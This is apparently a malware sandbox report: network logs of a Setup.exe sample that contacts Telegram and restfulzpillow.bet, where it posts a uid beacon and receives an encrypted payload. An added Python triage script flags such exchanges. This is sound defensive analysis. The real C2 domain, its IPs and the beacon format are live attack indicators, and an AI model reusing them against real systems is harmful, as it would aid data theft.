                                                                                                                                                                                                                      Mar 11, 2025 00:43:01.284352064 CET44349720142.250.74.196192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:43:01.284449100 CET44349720142.250.74.196192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:43:01.284682035 CET49720443192.168.2.16142.250.74.196
                                                                                                                                                                                                                      Mar 11, 2025 00:43:02.585779905 CET49720443192.168.2.16142.250.74.196
                                                                                                                                                                                                                      Mar 11, 2025 00:43:02.585846901 CET44349720142.250.74.196192.168.2.16
Timestamp | Source IP | Dest IP | Checksum | Code | Type
Mar 11, 2025 00:42:48.381966114 CET | 192.168.2.16 | 1.1.1.1 | c205 | (Port unreachable) | Destination Unreachable
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Mar 11, 2025 00:42:35.683386087 CET | 192.168.2.16 | 1.1.1.1 | 0x7fc8 | Standard query (0) | t.me | A (IP address) | IN (0x0001) | false
Mar 11, 2025 00:42:38.311512947 CET | 192.168.2.16 | 1.1.1.1 | 0xc71c | Standard query (0) | restfulzpillow.bet | A (IP address) | IN (0x0001) | false
Mar 11, 2025 00:42:45.427932978 CET | 192.168.2.16 | 1.1.1.1 | 0x2a4 | Standard query (0) | www.google.com | A (IP address) | IN (0x0001) | false
Mar 11, 2025 00:42:45.428266048 CET | 192.168.2.16 | 1.1.1.1 | 0x2db4 | Standard query (0) | www.google.com | 65 | IN (0x0001) | false
Mar 11, 2025 00:42:52.347181082 CET | 192.168.2.16 | 1.1.1.1 | 0x17d5 | Standard query (0) | apis.google.com | A (IP address) | IN (0x0001) | false
Mar 11, 2025 00:42:52.347471952 CET | 192.168.2.16 | 1.1.1.1 | 0x20f2 | Standard query (0) | apis.google.com | 65 | IN (0x0001) | false
Mar 11, 2025 00:42:53.342031002 CET | 192.168.2.16 | 1.1.1.1 | 0x2530 | Standard query (0) | play.google.com | A (IP address) | IN (0x0001) | false
Mar 11, 2025 00:42:53.342185020 CET | 192.168.2.16 | 1.1.1.1 | 0x39ac | Standard query (0) | play.google.com | 65 | IN (0x0001) | false
Mar 11, 2025 00:43:03.462310076 CET | 192.168.2.16 | 1.1.1.1 | 0x36e7 | Standard query (0) | restfulzpillow.bet | A (IP address) | IN (0x0001) | false
Mar 11, 2025 00:43:20.504508972 CET | 192.168.2.16 | 1.1.1.1 | 0x61e8 | Standard query (0) | restfulzpillow.bet | A (IP address) | IN (0x0001) | false
Mar 11, 2025 00:43:39.252681971 CET | 192.168.2.16 | 1.1.1.1 | 0x58e6 | Standard query (0) | restfulzpillow.bet | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Mar 11, 2025 00:42:35.690406084 CET | 1.1.1.1 | 192.168.2.16 | 0x7fc8 | No error (0) | t.me | | 149.154.167.99 | A (IP address) | IN (0x0001) | false
Mar 11, 2025 00:42:38.325000048 CET | 1.1.1.1 | 192.168.2.16 | 0xc71c | No error (0) | restfulzpillow.bet | | 104.21.11.150 | A (IP address) | IN (0x0001) | false
Mar 11, 2025 00:42:38.325000048 CET | 1.1.1.1 | 192.168.2.16 | 0xc71c | No error (0) | restfulzpillow.bet | | 172.67.166.92 | A (IP address) | IN (0x0001) | false
Mar 11, 2025 00:42:45.435072899 CET | 1.1.1.1 | 192.168.2.16 | 0x2a4 | No error (0) | www.google.com | | 142.250.74.196 | A (IP address) | IN (0x0001) | false
Mar 11, 2025 00:42:45.435096979 CET | 1.1.1.1 | 192.168.2.16 | 0x2db4 | No error (0) | www.google.com | | | 65 | IN (0x0001) | false
Mar 11, 2025 00:42:52.353920937 CET | 1.1.1.1 | 192.168.2.16 | 0x17d5 | No error (0) | apis.google.com | plus.l.google.com | | CNAME (Canonical name) | IN (0x0001) | false
Mar 11, 2025 00:42:52.353920937 CET | 1.1.1.1 | 192.168.2.16 | 0x17d5 | No error (0) | plus.l.google.com | | 142.250.185.206 | A (IP address) | IN (0x0001) | false
Mar 11, 2025 00:42:52.354521036 CET | 1.1.1.1 | 192.168.2.16 | 0x20f2 | No error (0) | apis.google.com | plus.l.google.com | | CNAME (Canonical name) | IN (0x0001) | false
Mar 11, 2025 00:42:53.348855019 CET | 1.1.1.1 | 192.168.2.16 | 0x2530 | No error (0) | play.google.com | | 142.250.186.142 | A (IP address) | IN (0x0001) | false
Mar 11, 2025 00:43:03.474621058 CET | 1.1.1.1 | 192.168.2.16 | 0x36e7 | No error (0) | restfulzpillow.bet | | 172.67.166.92 | A (IP address) | IN (0x0001) | false
Mar 11, 2025 00:43:03.474621058 CET | 1.1.1.1 | 192.168.2.16 | 0x36e7 | No error (0) | restfulzpillow.bet | | 104.21.11.150 | A (IP address) | IN (0x0001) | false
Mar 11, 2025 00:43:20.517044067 CET | 1.1.1.1 | 192.168.2.16 | 0x61e8 | No error (0) | restfulzpillow.bet | | 104.21.11.150 | A (IP address) | IN (0x0001) | false
Mar 11, 2025 00:43:20.517044067 CET | 1.1.1.1 | 192.168.2.16 | 0x61e8 | No error (0) | restfulzpillow.bet | | 172.67.166.92 | A (IP address) | IN (0x0001) | false
Mar 11, 2025 00:43:39.265891075 CET | 1.1.1.1 | 192.168.2.16 | 0x58e6 | No error (0) | restfulzpillow.bet | | 172.67.166.92 | A (IP address) | IN (0x0001) | false
Mar 11, 2025 00:43:39.265891075 CET | 1.1.1.1 | 192.168.2.16 | 0x58e6 | No error (0) | restfulzpillow.bet | | 104.21.11.150 | A (IP address) | IN (0x0001) | false
• t.me
• restfulzpillow.bet
• www.google.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.16 | 49701 | 149.154.167.99 | 443 | 6556 | C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exe
Timestamp | Bytes transferred | Direction | Data
2025-03-10 23:42:37 UTC | 67 | OUT | GET /owowoowokk3j4 HTTP/1.1
Connection: Keep-Alive
Host: t.me
2025-03-10 23:42:38 UTC | 511 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Mon, 10 Mar 2025 23:42:38 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 12417
Connection: close
Set-Cookie: stel_ssid=35aef6c15fabadbfda_4688273857333314051; expires=Tue, 11 Mar 2025 23:42:38 GMT; path=/; samesite=None; secure; HttpOnly
Pragma: no-cache
Cache-control: no-store
X-Frame-Options: ALLOW-FROM https://web.telegram.org
Content-Security-Policy: frame-ancestors https://web.telegram.org
Strict-Transport-Security: max-age=35768000
                                                                                                                                                                                                                      2025-03-10 23:42:38 UTC12417INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 6f 77 6f 77 6f 6f 77 6f 6b 6b 33 6a 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77
                                                                                                                                                                                                                      Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @owowoowokk3j4</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window


Session ID | Source IP    | Source Port | Destination IP | Destination Port | PID  | Process
1          | 192.168.2.16 | 49703       | 104.21.11.150  | 443              | 6556 | C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exe

Timestamp               | Bytes transferred | Direction | Data
2025-03-10 23:42:41 UTC | 267               | OUT       | POST /bWij HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 41
Host: restfulzpillow.bet
2025-03-10 23:42:41 UTC | 41                | OUT       | Data Raw: 75 69 64 3d 38 33 31 65 66 35 65 30 33 39 62 31 31 64 62 33 65 66 37 63 33 36 37 31 30 33 65 32 65 35 65 39 26 63 69 64 3d
Data Ascii: uid=831ef5e039b11db3ef7c367103e2e5e9&cid=
2025-03-10 23:42:42 UTC | 792               | IN        | HTTP/1.1 200 OK
Date: Mon, 10 Mar 2025 23:42:41 GMT
Content-Type: application/octet-stream
Content-Length: 14134
Connection: close
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Dxoe85RldFjBwU%2BeHjPHxJil%2FJeGg5mZ9dFbIYdJ3t42n91JdaIX0lutNbzETklUzpOcNtB%2BDU%2FwVBR5TuWGYbq0ADoNklsuFlPAVeV96uQkjWwEHkrPV%2BIwCbHgJNFsgi4N%2Bss%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 91e6ab85cd1a4356-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=9539&min_rtt=8744&rtt_var=3837&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2845&recv_bytes=944&delivery_rate=238550&cwnd=240&unsent_bytes=0&cid=21308640423a952a&ts=886&x=0"
2025-03-10 23:42:42 UTC | 577               | IN        | Data Raw: 25 a8 90 fc a1 b0 0a b7 2d 2b 03 54 87 67 c6 2e 32 a7 58 c6 4b 33 bf 34 19 25 c2 9b e9 31 ec 5a cc 0c 5c 4f a4 4a 63 c0 0a 68 76 b3 1a af 22 02 2f 53 ae 52 6e e3 b4 df 0a a6 0a e6 26 66 f2 dd 93 a8 b6 b6 1e 8d 30 40 0a 99 bf 86 96 e5 74 45 79 9b 8e 35 10 18 a2 36 b5 d6 36 86 61 ef df 89 ba 2a dc 21 37 53 70 ff 16 dd 06 ac f6 72 dc 34 14 77 5e a3 36 07 87 18 ec b3 31 4c 81 ae 18 a4 d4 c1 c0 6c 01 fa 3b c6 6b b5 80 5e 6d 28 1a d8 32 5f 8e b2 d4 9a 4f 56 a9 72 2e 62 49 7e eb 4a e8 34 5b c3 74 cb 52 7e c0 a5 4e 30 68 ed b1 ea 66 87 63 88 51 96 b7 3d 09 b9 93 6c 4b 33 ca 8a c3 a8 a4 3a 6e 62 77 78 1b b7 ca 2d 34 39 fb a6 6f 3c 5f df 7f c3 49 b0 00 2b 42 cb 7a 19 2b 9e 32 72 f9 3f e9 a7 16 d8 21 f6 15 5c f9 cb 25 eb c6 60 9d 30 75 f5 dd 58 3a 34 d6 0f e9 2a b1
Data Ascii: %-+Tg.2XK34%1Z\OJchv"/SRn&f0@tEy566a*!7Spr4w^61Ll;k^m(2_OVr.bI~J4[tR~N0hfcQ=lK3:nbwx-49o<_I+Bz+2r?!\%`0uX:4*
2025-03-10 23:42:42 UTC | 1369              | IN        | Data Raw: 61 46 ee fd 02 e6 49 a6 6b 51 e6 6e cb 15 d2 6c 9e 26 cb 30 85 6e c1 c3 9b e6 1f da 8d dc d0 96 2a 19 be 3f 21 a3 ec 5a 21 07 e5 57 3d 6a 22 2f 90 55 b9 79 47 1f 5d c2 89 4d 21 bc 88 44 d0 a4 80 77 2e 9b f8 88 09 f0 31 98 14 99 f3 3d 55 6d 57 5d 04 28 c1 60 5b 74 ac b2 5b 7e 80 49 78 89 52 35 76 c9 4e 62 64 c8 45 37 28 ae 58 48 fa 26 57 9a bc 83 2e ac 8c ad 0a db d0 24 c3 0b f0 58 e2 ad d0 eb eb ed ed 18 51 b8 b7 1c 68 24 81 b7 68 b3 d4 21 19 91 02 84 da 08 e9 98 76 d2 a1 4c 37 b8 ca af c5 e1 dc c6 09 24 d7 39 2c ea 98 da c4 fe 59 e2 ca a1 fc 1f ed 37 08 25 47 7a ba 91 7f 2d a7 4f 7c 7f f6 a3 24 8f dd a5 f5 20 45 26 3b ff d6 e5 2a 44 1c 72 c9 d2 ba 0c a7 0b a4 91 a1 d8 7e 64 eb 74 6d 26 2e 41 3a 44 fc eb cd f0 23 c7 da 54 d9 10 1e 4c c5 f2 ed d9 d7 9a fd
Data Ascii: aFIkQnl&0n*?!Z!W=j"/UyG]M!Dw.1=UmW](`[t[~IxR5vNbdE7(XH&W.$XQh$h!vL7$9,Y7%Gz-O|$ E&;*Dr~dtm&.A:D#TL
2025-03-10 23:42:42 UTC | 1369              | IN        | Data Raw: a2 b6 3f 19 2d ad ed c1 cf 4e 3b 41 c9 f3 a3 9e f2 36 d8 b7 5f 69 df f7 66 08 81 45 ef cc 96 ef 65 9e c3 d5 ed fe 84 92 33 f6 42 5d d8 41 f2 c9 dc 9c ab d0 6a bd 0b 52 0d ea 1f 73 13 5a e2 a5 70 3e 46 4f 9c b6 aa ab 71 7a 22 5a 05 f1 9b 18 a9 67 50 b0 85 76 30 50 3b 3f 09 74 94 21 c0 f1 85 35 aa 98 c0 01 43 43 f1 c4 1a 5d fb e5 d9 f3 f4 07 de 64 5b 4a 2d e1 f4 9c ea 99 a9 3a 46 28 f4 f5 12 86 a8 53 22 46 79 da b5 38 40 e1 1c b0 23 a6 86 54 dc de 2a 5e 2a 67 39 a1 b7 f4 3b bc 67 bb 6e e2 b5 8d 02 77 4b 14 39 59 fe 02 97 fd 36 33 84 2d 70 ea e6 44 1f df 06 74 9a 29 b6 a3 95 c1 a2 55 0a 24 4b aa 51 4c ab b0 a7 92 b5 50 c2 b7 01 a0 3f af e5 69 a9 e9 63 9c 0c ae 83 0c 3a 19 8b c3 ee a6 c6 7b c3 13 b7 36 27 58 0c 90 bc de 33 94 75 e1 90 37 f4 c7 e8 f1 8d 1c 73
Data Ascii: ?-N;A6_ifEe3B]AjRsZp>FOqz"ZgPv0P;?t!5CC]d[J-:F(S"Fy8@#T*^*g9;gnwK9Y63-pDt)U$KQLP?ic:{6'X3u7s
2025-03-10 23:42:42 UTC | 1369              | IN        | Data Raw: cf b5 4b b3 ba fd e0 7d 49 78 19 81 91 51 5a e6 96 b2 20 39 a7 d2 b1 5a c6 6f f8 88 f2 75 1f 5b 4e e9 64 96 58 c1 df e1 21 49 e4 77 d5 5e 86 7d 80 e0 8b 0c f5 84 fe c4 65 d3 50 70 2d 38 1e 1f 8e 90 7e 20 2a ca 28 4b 1f 56 6a 65 9e 4b bd 92 1c 4b d5 81 04 b4 81 35 28 c8 fb df 73 65 5c 00 8a 0c 55 2b d3 0c 7f f7 3d 8e bb cc 27 2d 6f 20 4b 6d 83 db 47 10 65 c7 f9 af 70 d5 3d 50 f5 89 0d d1 6e 2d dc 8a b6 de 96 5b 83 19 ed 27 fa 20 9d b8 31 18 6b a9 da 1f 10 fd f9 3d 13 23 ea c9 2c 6e 56 98 81 0a 02 3e 51 4d 95 de f7 94 eb 6e 87 2d 0f b6 9b 78 3c 09 4b bd e3 2e aa 96 42 ac d3 44 f4 d9 2f 6f 72 01 27 85 8f 4c 2b 1b 62 ed ed 01 02 3c 82 29 bb 80 5c 04 af ee 3e e7 a0 3d 7e a3 ca 78 ff db 7f 81 00 06 43 c9 ad 39 61 b0 45 d3 fc ae 58 d9 9b f2 84 99 eb 43 aa ce 92
Data Ascii: K}IxQZ 9Zou[NdX!Iw^}ePp-8~ *(KVjeKK5(se\U+='-o KmGep=Pn-[' 1k=#,nV>QMn-x<K.BD/or'L+b<)\>=~xC9aEXC
2025-03-10 23:42:42 UTC | 1369              | IN        | Data Raw: 32 81 14 b2 72 b6 4e d5 bc 5f 20 a2 9a 6c 0e a9 6d e3 e8 d8 18 d3 72 7b a0 e3 9f a0 e5 28 8d 4b 70 55 2a bf fe 89 27 d4 01 9c 04 eb ce 74 4a cf c4 61 47 30 80 7b 18 b7 bc bc 28 bf a2 ea 88 3a 31 1a bd fd a0 79 8c 3d aa 88 bc b4 d6 f4 b1 92 65 77 89 49 be 17 85 8a f1 d8 1d eb e6 6c a7 2d 67 cc 72 86 fd df 62 a3 2c e0 3c 76 b3 e3 b7 79 74 e1 bf 45 87 55 87 64 99 ae 19 89 06 36 20 b0 10 13 d3 8e aa a9 95 71 d3 fe cf 2c dc b0 01 65 21 b2 70 43 55 a8 e2 76 f1 7d 91 84 79 1a c0 db bb bb da 21 9e 3c ed 5f 31 c7 9f f8 73 f8 e6 65 8f d7 4d 79 59 3b e7 3f 2f 0c 22 b8 a6 10 86 b7 54 23 3b d4 5f c5 ee 55 92 83 d4 b4 9a 3c 98 21 86 31 7a 04 21 fd 1a 09 75 b7 da 6c a5 c0 d9 79 17 41 9b b4 d3 7e 1d ec 8b df e1 23 9b 5c 7e 41 67 6e d4 a2 c9 41 8b bc 23 70 7a e5 6e 0c cc
Data Ascii: 2rN_ lmr{(KpU*'tJaG0{(:1y=ewIl-grb,<vytEUd6 q,e!pCUv}y!<_1seMyY;?/"T#;_U<!1z!ulyA~#\~AgnA#pzn
2025-03-10 23:42:42 UTC | 1369              | IN        | Data Raw: 5e 38 52 16 fa 56 5a 9c 48 d7 d5 5b 76 29 00 c1 92 d9 5d 6e 3a 22 5b dd 59 44 10 f1 da c7 f0 76 b1 7a 7e c2 e8 30 59 69 89 14 bf ad a0 52 47 f1 ff 22 bc d5 aa 9c 10 06 83 1e 04 e1 bc b2 85 bd 1e 55 10 a6 df c9 6e 13 4c a9 4d f3 26 5d 14 1e e5 25 3c bd b9 21 f3 ef 78 3e 4f 5c 96 7d b1 ec 9c 43 d9 bc 8a 89 19 cd f3 c8 cc 01 c1 45 8e 9d f7 cc 7c d9 15 2d 7a 17 6a 3a 3e 85 8c 2a 89 e5 ac 06 49 a9 43 a5 14 50 f8 ce b4 6b 18 90 15 76 70 da 0f 3b fb 74 f3 3b 52 c9 88 24 79 72 90 fa 95 15 8e 33 cc 95 8d 99 dd 91 46 d3 2b c8 ac 7c e2 a4 42 bc 26 e1 b4 ce 7f 59 6b 36 fe 1c a2 65 4e ad 0a 1e 75 7f a1 eb 60 6a be 4d 87 33 d9 88 e7 d7 9a d5 ab 58 a1 d1 94 56 cd 39 e0 a3 3c db e9 65 4f c2 1e d3 b9 df 50 9c de 81 e1 c3 3d f5 5b 35 7e b3 2c dc c4 8f 3a fb f0 fd 9c db a8
Data Ascii: ^8RVZH[v)]n:"[YDvz~0YiRG"UnLM&]%<!x>O\}CE|-zj:>*ICPkvp;t;R$yr3F+|B&Yk6eNu`jM3XV9<eOP=[5~,:
2025-03-10 23:42:42 UTC | 1369              | IN        | Data Raw: ff 30 a2 a0 a0 19 90 78 10 b7 f0 dc f5 e2 ff d1 c5 f5 3c 5f 85 11 1e 8c d7 1e ef 1d e8 61 69 b3 84 6c 10 eb bb 59 b8 99 38 bc 35 f6 65 3f e2 fd 33 7e 20 ce a5 c0 d1 2d 48 50 72 5b f2 50 fb 07 c9 e5 30 30 1a 9c a8 ff f7 24 d8 b5 70 b8 b9 0d c3 64 cf 84 d2 b6 05 39 08 fd a2 46 e3 c0 27 08 a2 91 54 df 89 a2 9d 3e 2e c1 10 52 b5 65 0a 49 b8 61 ea cf 58 65 12 ae 01 e3 75 1e 2b c1 e5 0f 07 4d 3b 45 92 5e b8 b6 33 a8 d0 7e 56 b3 ad bf 73 59 53 25 e5 c8 fd f9 6b a7 9f ce 47 d5 a1 2a d7 0d 07 e0 b3 e4 a5 97 fe a6 2e bf be 20 76 f8 a1 6c f2 4c 7d a3 8e 0f 0c 1a 16 72 3c c8 26 91 61 c7 f8 96 b3 f3 25 dc 12 3e 23 81 fd 11 c0 c2 3c b0 f4 ea 46 83 5a 64 00 31 7f 06 f9 2c 12 84 10 5a d4 6d b7 b4 68 c0 83 64 74 d9 0a 7c 87 c2 eb e3 e8 85 20 77 6d 82 5b 56 35 4d 96 39 7d
Data Ascii: 0x<_ailY85e?3~ -HPr[P00$pd9F'T>.ReIaXeu+M;E^3~VsYS%kG*. vlL}r<&a%>#<FZd1,Zmhdt| wm[V5M9}
2025-03-10 23:42:42 UTC | 680               | IN        | Data Raw: ae 2c d3 5f 38 84 20 b5 ab 68 7e 2f b8 42 9e f5 62 bd ad 50 b5 fb 95 e2 96 f9 da c0 c2 b8 c2 f2 9e dc d0 d1 cc a3 93 fa 0b 1b 50 9f 86 14 14 6a 2b 73 c7 e1 ba 6c ba 52 c8 29 50 3d 7a de fe 24 ed 28 9d 4f b8 2f 0a 1a 19 ca ad 0e c0 35 ba 1f 46 23 10 ba f3 19 3a b8 81 08 a6 54 93 36 a7 a2 4d dc 11 94 77 9d a3 e0 c4 da e2 35 53 88 a2 57 da 8b cf b7 e2 d3 5d 80 b0 0c 9c 56 1e 85 c3 1c c3 2d 3f 9d 1f 2d 92 47 e3 95 2b 92 bb aa 3f 51 5d af 2e 47 11 29 de a8 39 79 cc 81 f6 c8 52 1b 98 73 02 bd 20 43 4c e7 3b 1f 63 86 9d 11 8c cd 2a d0 32 0b ec a3 45 d5 e0 83 8f cd 4c 5e 00 0b ad e7 7c 5a 10 b0 96 5d 81 e5 64 a9 9e af 1e 7e 8e fe 25 40 79 57 d5 60 83 a8 9c 3e f6 39 0d 58 5d b2 80 eb 84 f6 8f ca 6d e1 72 26 f4 4b bd 7c 7c d4 18 72 48 4e aa 47 0e f3 1d 4a 1e 6e c2
Data Ascii: ,_8 h~/BbPPj+slR)P=z$(O/5F#:T6Mw5SW]V-?-G+?Q].G)9yRs CL;c*2EL^|Z]d~%@yW`>9X]mr&K||rHNGJn
2025-03-10 23:42:42 UTC | 1369              | IN        | Data Raw: 8f 7a cc 6a bd 2c 28 79 15 0f 33 9e 8e f3 27 23 e2 63 cb 2c a5 71 c3 d7 95 84 93 ab d9 12 09 f2 79 30 37 a4 ed eb b0 a7 56 32 51 10 4e 3a 10 e6 cf 69 52 78 08 14 33 f8 af 57 18 32 5d 2a cb ac 60 19 c5 51 eb 53 32 62 c1 79 22 82 96 a1 7b 5e 15 d3 1c ee 8a d1 a2 9c 12 f7 e9 d6 ad 47 5a fd e6 93 fe 29 ee 51 f5 1d 86 4a 07 a8 6b ef 25 5d d7 40 1e 69 86 65 db 8e 28 e6 be 88 7b b7 ab 18 a9 03 20 bc 2b b5 b6 05 6d 8f 59 78 4d fc 7e cd 8d dd f6 4b 67 88 98 7d 6a 3a bb 51 c5 52 01 59 a8 09 fc ed 64 80 7d b0 0c d7 f5 5c db 7d f6 6e 8d 22 2e 68 15 48 63 d8 e7 73 ee a1 3c 1a f2 dd 50 41 76 73 db cd 28 82 87 37 11 19 48 5e c3 f3 cc 79 04 92 41 ea ce cd 4c dd 47 91 bf 82 05 1b ec 41 60 30 9c 4f 1d 30 6a 1b cb 1d b6 8e f4 89 15 50 ec 53 19 9b 12 aa 2a a5 5c 55 db 17 47
Data Ascii: zj,(y3'#c,qy07V2QN:iRx3W2]*`QS2by"{^GZ)QJk%]@ie({ +mYxM~Kg}j:QRYd}\}n".hHcs<PAvs(7H^yALGA`0O0jPS*\UG
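Session 1 above is the only contact the sample makes with its own infrastructure in this report: a form-encoded POST to restfulzpillow.bet carrying a 32-hex-character uid and an empty cid, answered with 14134 bytes of application/octet-stream whose Data Ascii rendering contains nothing readable, while the request's User-Agent claims Chrome/119 on a host whose real Chrome (session 2) identifies as 134. The Python below is an added example and is not part of the Joe Sandbox report: it parses rows in this dump's fused timestamp/bytes/direction/data layout, reassembles bodies from the Data Raw hex, and tags each exchange with three heuristics. The uid/cid body pattern, the 0.6 printable-byte threshold and the Chrome major-version comparison are assumptions drawn from this single report, not a published LummaC signature, and the embedded dump is constructed from the rows above with only the first 64 response bytes included.

```python
import re
from dataclasses import dataclass, field

# Constructed input: session 1 from the report above (response body truncated to 64 bytes).
DUMP = """\
2025-03-10 23:42:41 UTC267OUTPOST /bWij HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 41
Host: restfulzpillow.bet
2025-03-10 23:42:41 UTC41OUTData Raw: 75 69 64 3d 38 33 31 65 66 35 65 30 33 39 62 31 31 64 62 33 65 66 37 63 33 36 37 31 30 33 65 32 65 35 65 39 26 63 69 64 3d
Data Ascii: uid=831ef5e039b11db3ef7c367103e2e5e9&cid=
2025-03-10 23:42:42 UTC792INHTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 14134
Server: cloudflare
2025-03-10 23:42:42 UTC577INData Raw: 25 a8 90 fc a1 b0 0a b7 2d 2b 03 54 87 67 c6 2e 32 a7 58 c6 4b 33 bf 34 19 25 c2 9b e9 31 ec 5a cc 0c 5c 4f a4 4a 63 c0 0a 68 76 b3 1a af 22 02 2f 53 ae 52 6e e3 b4 df 0a a6 0a e6 26 66 f2 dd
"""

# A dump row is "<timestamp><bytes><IN|OUT><data>" run together, e.g. "...UTC267OUTPOST /bWij HTTP/1.1".
ROW = re.compile(r"^(\d{4}-\d\d-\d\d \d\d:\d\d:\d\d UTC)(\d+)(IN|OUT)(.*)$")
# Assumed beacon shape: the one request body observed in this report.
BEACON_BODY = re.compile(rb"^uid=[0-9a-f]{32}&cid=")
# Major version of the Chrome actually installed in the sandbox (session 2 in the report).
HOST_CHROME_MAJOR = 134


@dataclass
class Message:
    timestamp: str
    direction: str                      # OUT = sandbox to server, IN = server to sandbox
    start_line: str                     # request line or status line
    headers: dict = field(default_factory=dict)
    body: bytes = b""


def parse_dump(text: str) -> list:
    """Turn dump rows into Message objects with headers and reassembled bodies."""
    messages = []
    for raw in text.splitlines():
        line = raw.strip()
        m = ROW.match(line)
        if m:
            ts, _nbytes, direction, data = m.groups()
            if data.startswith("Data Raw:"):
                # Body chunk: append to the most recent message in the same direction.
                target = next(msg for msg in reversed(messages) if msg.direction == direction)
                target.body += bytes.fromhex(data[len("Data Raw:"):])
            else:
                messages.append(Message(ts, direction, data))
        elif line.startswith("Data Ascii:"):
            continue                    # lossy rendering of the hex row; not needed
        elif ": " in line and messages:
            name, value = line.split(": ", 1)
            messages[-1].headers[name.lower()] = value
    return messages


def pair_exchanges(messages: list) -> list:
    """Pair each outbound request with the inbound response that follows it."""
    pairs, pending = [], None
    for msg in messages:
        if msg.direction == "OUT":
            pending = msg
        elif pending is not None:
            pairs.append((pending, msg))
            pending = None
    return pairs


def printable_fraction(data: bytes) -> float:
    """Share of bytes in 0x20..0x7e: close to 1.0 for text, roughly 0.37 for encrypted data."""
    if not data:
        return 0.0
    return sum(0x20 <= b <= 0x7E for b in data) / len(data)


def assess(req: Message, resp: Message) -> list:
    """Tag one exchange. These are triage heuristics (assumptions), not a detection signature."""
    tags = []
    if (req.start_line.startswith("POST ")
            and "x-www-form-urlencoded" in req.headers.get("content-type", "")
            and BEACON_BODY.match(req.body)):
        tags.append("beacon-body")
    if ("octet-stream" in resp.headers.get("content-type", "")
            and printable_fraction(resp.body) < 0.6):
        tags.append("opaque-response")
    claimed = re.search(r"Chrome/(\d+)", req.headers.get("user-agent", ""))
    if claimed and int(claimed.group(1)) != HOST_CHROME_MAJOR:
        tags.append("ua-version-mismatch")
    return tags


def analyse(text: str) -> list:
    """Parse a dump and return [(host, path, tags)] for every request/response pair."""
    results = []
    for req, resp in pair_exchanges(parse_dump(text)):
        path = req.start_line.split(" ")[1]
        results.append((req.headers.get("host", "?"), path, assess(req, resp)))
    return results


if __name__ == "__main__":
    for host, path, tags in analyse(DUMP):
        print(f"{host}{path}: {', '.join(tags) or 'nothing flagged'}")
```

Each tag on its own is weak: a software updater also POSTs short form bodies and pulls back opaque blobs, and a hard-coded User-Agent is common in legitimate installers. What makes the exchange worth escalating is the combination with the process context the report already gives (Setup.exe launched from a Temp1_Malware.zip extraction, the stealer YARA hits, the low-severity Suricata alert), so treat the output as a triage hint and keep the beacon-body regex tied to this report rather than generalising it to all LummaC traffic.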


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      2192.168.2.1649711142.250.74.1964437160C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2025-03-10 23:42:47 UTC501OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1
                                                                                                                                                                                                                      Host: www.google.com
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      X-Client-Data: CLbgygE=
                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br, zstd
